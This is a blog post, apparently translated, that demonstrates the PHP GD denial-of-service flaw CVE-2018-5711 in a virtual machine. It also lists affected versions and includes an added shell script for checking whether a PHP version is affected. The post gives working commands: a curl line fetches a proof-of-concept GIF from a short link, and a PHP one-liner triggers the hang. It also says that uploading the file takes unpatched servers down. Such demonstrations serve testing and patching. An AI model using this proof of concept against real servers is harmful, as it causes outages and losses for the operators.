
A Taiwanese hacker found that a single GIF image can take down a server, and operations teams will be busy again this month

Dazzle Yi, 2018-02-03, Industry trends

There is a lot of talent in China. Orange, a hacker from Taiwan, has found a vulnerability in PHP, CVE-2018-5711. This vulnerability can instantly take down a server that supports PHP. I will demonstrate it in a Kali 2017.3 virtual machine.


1、 Check whether my virtual machine has the PHP GD library


1. Run the command:

 php -m | grep -i gd


2. If GD does not appear in the output above, it needs to be installed. Run the command:

 apt-get install php-gd


2、 Generate the malicious GIF file

1、

 curl -L https://git.io/vN0n4 | xxd -r > poc.gif




2. Run the top command to see the CPU usage before the test


3. Test the malicious file:

 php -r 'imagecreatefromgif("poc.gif");'



The CPU rose to 100% instantly. I wanted to run the top command again, but I could not make a CPU comparison chart. I had to restart my Kali VM.


The versions affected by this vulnerability are:

PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1
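
The version table above, turned into a check that can be run on a host. This is an added example, not part of the original post; the function names `ver_num` and `cve_2018_5711_status` are made up here. It compares upstream version numbers only, so a distribution package that carries a backported fix can still print `affected`.

```shell
#!/bin/sh
# Added example: classify a PHP version against the affected ranges listed above.
# Function names are hypothetical and not taken from any existing tool.

# ver_num X.Y.Z[suffix]: print major*10000 + minor*100 + patch, fail if unparsable.
ver_num() {
    parts=$(printf '%s\n' "$1" |
        sed -n 's/^\([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2 \3/p')
    [ -n "$parts" ] || return 1
    printf '%s\n' "$parts" | awk '{ print $1 * 10000 + $2 * 100 + $3 }'
}

# cve_2018_5711_status VERSION: print affected, fixed, unlisted or unknown.
cve_2018_5711_status() {
    n=$(ver_num "$1") || { echo unknown; return 0; }
    case "$1" in
        5.*)   first_fixed=50633 ;;   # PHP 5   < 5.6.33
        7.0.*) first_fixed=70027 ;;   # PHP 7.0 < 7.0.27
        7.1.*) first_fixed=70113 ;;   # PHP 7.1 < 7.1.13
        7.2.*) first_fixed=70201 ;;   # PHP 7.2 < 7.2.1
        *)     echo unlisted; return 0 ;;   # branch not in the article's table
    esac
    if [ "$n" -lt "$first_fixed" ]; then echo affected; else echo fixed; fi
}

# Report on the local interpreter, if one is installed.
if command -v php >/dev/null 2>&1; then
    php_ver=$(php -r 'echo PHP_VERSION;')
    if php -m | grep -qix 'gd'; then gd=loaded; else gd='not loaded'; fi
    echo "PHP $php_ver, GD $gd: $(cve_2018_5711_status "$php_ver")"
fi
```

A result of `affected` only matters when GD is loaded, since the vulnerable call is GD's `imagecreatefromgif`.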

If a server supports the PHP GD library, it goes down once the generated poc.gif is uploaded to it. Finally, I want to stress that some servers have not yet been patched for this vulnerability. A prank would cause economic losses to the other party and violate the state security law, so be sure to test only in a virtual machine and to understand the principle of this vulnerability.


Comment list

 Ji Changxin
Three years ago (2018-02-28)

https://blog.isoyu.com/archives/gongyiapi.html
Do you want to write an article for promotion

Dazzle Yi reply:
Seriously, I don't know much about API
Three years ago (2018-03-30)
 Gcod
Three years ago (2018-02-14)

Front row onlookers

 Ji Changxin
Three years ago (2018-02-08)

Big guy, big guy
